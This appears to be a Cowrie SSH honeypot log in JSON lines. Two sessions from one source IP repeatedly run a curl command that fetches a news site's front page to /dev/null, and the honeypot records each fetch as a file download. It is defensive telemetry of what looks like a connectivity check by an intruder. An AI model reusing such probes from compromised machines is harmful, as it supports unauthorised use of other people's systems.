{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.654415Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.658259Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.666579Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.670802Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.671958Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.675695Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.676704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.680293Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.692553Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.694438Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.711114Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.716411Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.717350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.721337Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.722172Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.736180Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.755743Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.756836Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.761455Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.762807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.775872Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.786840Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.788463Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.798189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.799407Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.802237Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.803591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.805920Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.819256Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.834305Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.838371Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.839643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.845262Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.847519Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.848692Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.871988Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.876193Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.877059Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.901463Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.904469Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.906361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.909089Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.930835Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.935075Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.936125Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.941486Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.944235Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.946746Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.947538Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.974196Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.975190Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:10.985433Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.986390Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:10.989767Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.015545Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.016650Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.017486Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.027599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.028534Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.038398Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.047931Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.049381Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.052091Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.053567Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.070734Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.071815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.075023Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.077673Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.087880Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.088723Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.091151Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.093474Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.111865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.112898Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.115759Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.119735Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.128442Z","src_ip":"212.227.125.160","session":"7541ed730449"}
